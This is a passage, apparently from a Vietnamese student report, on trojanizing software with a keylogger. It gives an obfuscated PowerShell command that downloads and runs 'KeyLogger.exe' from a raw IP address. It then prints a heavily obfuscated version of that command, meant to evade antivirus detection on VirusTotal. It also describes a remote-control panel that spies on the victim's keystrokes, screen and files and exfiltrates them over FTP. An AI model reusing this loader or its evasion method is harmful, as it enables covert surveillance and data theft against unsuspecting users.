("$env:APPDATA\Active"+'W'+'indow'+'s')(&("{0}{1}{2}"-f'New-O','bje','ct') ("{0}{1}{4}{3}{2}"-f'Sys','t','ent','ebCli','em.Net.W')).("{2}{0}{3}{1}"-f 'wnloa','File','Do','d').Invoke(("{8}{3}{2}{5}{4}{6}{0}{7}{1}"- f'gger.e','e','0','1','9','3.6','.193.23/KeyLo','x','http://'),("$env:APPDA TA\Active"+('Windows'+'hAdActiv'+'e'+'.'+'e'+'xe').("{0}{1}"- f'rEplAc','e').Invoke('hAd','\'))).("{2}{0}{1}{3}"-f'rt','-

(("$env:APPDATA\Active"+(('Window'+'s3Q'+'l'+'Acti'+'ve.exe')-replACe

Hình 16.Mã độc được lưu tại server

Sau khi thêm đoạn mã độc trên vào phần mềm vào kiểm tra lại với trang Virustotal thì có kết quả như sau:

Hình 17 Kết quả Virustotal kiểm tra sau khi thêm mã độc vào phần mềm

Từ kết quả trên ta có thể thấy rõ các phần mềm Antivirtus thông dụng vẫn có thể phát hiện ra phần mềm độc hại của mình Nguyên nhân chính là từ đoạn mã độc vừa được thêm vào ở trên Để có thể làm cho kết quả từ trang Virustotal cho kết quả thấp nhất có thể, nhóm sẽ sử dụng kỹ thuật Obfuscation như đã đề cập trước đó để bypass các chương trình Antivirus

Sau khi thực hiện kỹ thuật Obfuscation , chúng ta sẽ quan sát lại đoạn mã độc cũng như kết quả sau khi thực hiện quét trên trang virustotal lần cuối

(-jOIN [System.Text.RegularExpressions.Regex]::MatChES(\" )

)93]RAHC[,)18]RAHC[+65]RAHC[+011]RAHC[(ecaLpErC - 43]RAHC[, 'sna' ecaLpErC -

421]RAHC[,)76]RAHC[+67]RAHC[+301]RAHC[(ecaLpErC -)')Q8' + 'nQ8nnIOJ-

]2,11,3[eMan.)Q8n*rDM*Q8n Vg(( CLg )63]rAHC[,)47]' + 'rAHC[+75]rAHC[+79]rAHC[( eCAlpERC- 93]rAHC[,Q8ntvmQ8n eCaLPEr-421]rAHC[,)18]' +

'rAHC[+87]rAHC[+101]rAHC[(eCAlpE' + 'RC- ))Q8n1 , 3Q8n,Q8n, 361, 361,501,Q8n,Q8n , 7' + '4, 35 , 531, 36,16, 331,401 ,151, 451 ,411,541 ,011,361 ,44,35, 531,16 ,33tvm+t' + 'vm1,tvm+t' + 'vm 441,Q8n,Q8n1 ,461 , 46, 741,76 ,30Q8n,Q8n1,17,461 , 111,051, 511 ,441, 76, tvm+tvm311, 411, 561 ,201 ,601 , 021, 051, 171 ,36 ,

16,451 ,tvm+tvm 661,601 ,741 ,35, 751, 611 , 011, 171 ,16, 411 ,16 ,111 , 161 , ' + '751 , ' + '26,Q' + '8' + 'n,Q8n 15,04 , 1' + '5 , 04,361 ,321 , 541,261 ,061 ,551 , 711 ,341 ,541 , 441 ,27 ,27 , 531 , 541Q8n,Q8n' + '1,541, 211, 241 ,751, 5' + '5 , 721, 541,611 , 05 ,05,221,tvm+tv' + 'm541, 441 ,141' + ' ,' + '501,261, tQ8n,Q8n51 ,55, 721,541,611 ,05,04, 15, 74 ,0t' +

'vm+tvm71Q8n,Q8ndILlEhSJ9a+]1[dilLehsJ9a (.' + ' QNe

)63]RaHc[]GNIRTs[,tvmskrtvm(ECalPeR.)93]RaHc[]GNIRTs[,)08]RaHc[' +

'+05]RaQ8n,Q8n,17, 501 , 16 ,301 tvm+tvm,30' + '1 , Q8n,Q8n, 65 ,751 , 151 ,04,04 ,421 ,34Q' + '8n,Q8n2M+' + ']3,1[)EQ8n,Q8n171 , 75 ,101 , 151, 16, 36 ,711 ' + ',35 ,141, Q8' + 'n,Q8n01, 121,tvm+tvm tvm+tvQ8n,Q8n311, 46,4Q8n,Q8n1, 331,

'64tQ8n,Q8n1tvm+tvm, 4' + '11,501,011 ,361 , 44 , 04, 05, 04 ,65,04(( niOj-tv' + 'm( Q8n,Q8n 141,66tvm+tvm1 ,051, 56Q8n,Q8n, 251,16, 701,171,141,411,401 ,' + '

051 , 271 , 761, 46 , 171Q8n,Q8nT::]tReVNoc[ ( { %ZdG)15 ,05, 441,611 ' + ', 501 , 711, 461,' + ' 441 ' + ', 141,5tvm+tvm01,261 , 65,' + '15, 04tvm+tvm, 15,151, 15tvm+tvm1 , 30tvm+tvm1,3tvm+tvm61 Q8n,Q8n ,16 ,Q8n,Q8n1 ,301, 16 ,351 ,361 , 66 , 07,7' + '5, 41tvm+tvm1' + ' , 261 , 301,621, 071,301 , 621 , 321 ,101 , 061,

611, 231 , 121,56,141 , 3Q8n,Q8n' + '51 , 421 , 1tvm+tvm6 ,461,16tvm+tvm1Q8n,Q8n, 211' + ',601,tvm+tvQ8n,Q8n , 441 , 751 , 5' + '51' + ',Q8n,' + 'Q' + '8n011 ,711 ,421 ,661 ,341, 521' + ', 06 , 17tvm+tvm, 111,661, 46 ,601 , 071 ,tQ8n,Q8n361,

351 ,071,641 ,301,511 , 75 , 151, 36 ,151 , 401,171 ,031,061 , 151 , 641 ,46 ,' + '321Q8n,Q8nm221 , 021 , 121,tvm+tvm341 , 661 ,151Q8n,Q8n11,151, 661,51' + '1 ,76 , 411,' + ' 17 ,401,26 ' + ',501Q8n,Q8n5 ,711, 151 ,' + '04 ,421, 341 ,541, 211 ,241 , 7Q8' + 'n,Q8n1 ' + 'Q8n,Q8n21 ,4tvm+tvm01 ,' + '561,721, ' + '761,661 , 15Q8n,Q8n301, 65 ,711 ,1Q8n,Q8n271,031 ,35,221, 141, 361 ,141 , tvm+tvm711,

351,tvm+tvmQ8n,Q8' + 'n,451 ,521 ,551 , 101 ,0tvm+tvm61, 441 ,651 ,07 , 131, 451 , 061,341,071,75, 221,5' + '01 ,501tvm+tvm,761, 511,361 ' + ', 421 , 201, 011 ,231 , 031 ,74 ,05 ,701 ,6' + '51 , 151,221 , 461' + ',tvm+tvm tvm+tvm361 ,46 ,66 , 501, 321, 141,201,5tvmQ8n,Q8n)tvm+tvm8, ))(GnIr' + 'tSOt._skr ((61tNIoQ8' + 'n,Q8n1,761 ' + ', 741 ,561 ,741 , 031, 16,17, 221 ,341, 711 , 021,061, 0' +

,461Q8n,Q8nvm+tvm461 , 221 , 20' + '1, 16 ,56 ,271, 66 , 751 ,021,361 ,661tvm+tv' + 'm,051,07,26Q8n,Q8n,' + '721 ,tvm' + '+tvm321,tvm+tvm 601 ,

Q8n,Q8n)tQ8n,Q8n+tvm11 , 751 ,261,601 ,27,27 , 531, 42tvm+tvm1,221 ,tv' +

,031,301,701tvm+tvm, 3' + '5 , Q8' + 'n,Q8nvm+tvm551tvm+tvm ,101, 501 ,261

651,141,461 , 511' + ',521 , 651 ,tvm+tvm 451,13t' + 'vm+tvm1 ,321,611, 711 , 171 , 66 , 46,Q8n,Q8n , 421, 321 , 551, 511,46 , 421 ,401 , 75 , 021 , 251 , 421, 341 , 441 , 651 , 17 ,26, 021 ,421, 2' + '6 ,321, 03Q8n,Q8n ,21Q8n,Q8nCneREfERpEs' + 'oBrevskr]gnIRtS[( ' + '( ZdG )} )]RAHC[ Sa-Q8n,Q8n6tvm+tvm, 611Q8n,Q8nvm' + '+tvm1 , 501,441, 65 ,611 , 751, 111,361 ,' + ' 361,5tvm+tvm41 ,221 ,021,

'Q8n,Q8nHc[+77]RaHc[((ECalPeR.)421]RaHc[]GNIRTs[,)0' +

'9]RaHc[+001]RaHc[+17]RaHc[((ECalPeR.)tvm)P2MP2MNIoj-P2MXPQ8n,Q8n 151

65 , ' + '611 , 751 , 111Q8n,Q8n171 ,26 , 07 ,071 ,' + ' Q8n,Q8nm231 ,761' + ',161 ,tvm+tvm 031,1' + '0Q8n,Q8n111, ' + '4tvm+tvm6,441,251Q8nf- sna}13{}61{}66{}01{}36{}22{}93{}55{}81{}4{}43{}73{}96{}05{}8{}53{}3{}37{}62{}24{} 52{}11{}51{}94{}33{}7{}72{}21{}92{}06{}64{}45{}2{}14{}75{}17{}07{}26{}84{}56{}0{} 65{}32{}47{}41{}25{}23{}6{}' + '34{}91{}15{}1{}8' + '3{}12{}42{' +

Hình 18 Mã độc đính kèm trên phần mềm đã dùng kỹ thuật Obfuscation

Hình 19 Kết quả Virustotal khi thực hiện kỹ thuật Obfuscation

Triển khai mã độc

Sau khi tiêm thành công đoạn mã độc chính vào hệ thống và vượt qua Antivirus, thì đoạn mã độc chính sẽ được thực, thi từ đây chúng ta có thể giám sát được máy nạn nhân Mã độc sẽ được ẩn đi và khiến người dùng khó có thể phát hiện ra nó

Hình 20: Mã độc được ẩn giấu trong máy nạn nhân

Khi mã độc chính được thực thi nó sẽ có các chứng năng giống như một

“keylogger”, khi mà nó sẽ giám sát chuột bàn phím và màn hình của nạn nhân Sau đó gửi những dữ liệu này qua một FTP server và được lưu theo một cấu trúc thư mục nhất định

Ngoài ra nó còn tiến hành kết nối tới một ứng dụng thông qua môi trường mạng, ứng dụng này dùng để điều khiển các con mã độc này Cấu hình cho mã độc hoạt động và theo dõi sự hoạt động của những mã độc này Giám sát mã độc còn tồn tại hay không

Hình 22: Ứng dụng điều khiển mã độc

Hình 23: Các cấu hình cho mã độc

Một số chức năng giúp kẻ tấn công có thể theo dỏi người dùng ngay trên chính ứng dụng điều khiển mã độc

 Theo dõi màn hình của mục tiêu Có thể theo dõi màn hình của các mục tiêu các thay đổi trên màn hình mục tiêu

 Theo dõi hệ thống tập tin của mục tiêu Cỏ thể xem tổ chức thư mục và một số thông tin của các tập tin trên máy tính mục tiêu, đồng thời có thể tải chúng về

Hình 24: Theo dõi màn hình mục tiêu

Hình 25: Theo dõi hệ thống tập tin của mục tiêu

Định dạng
Số trang	37
Dung lượng	1,93 MB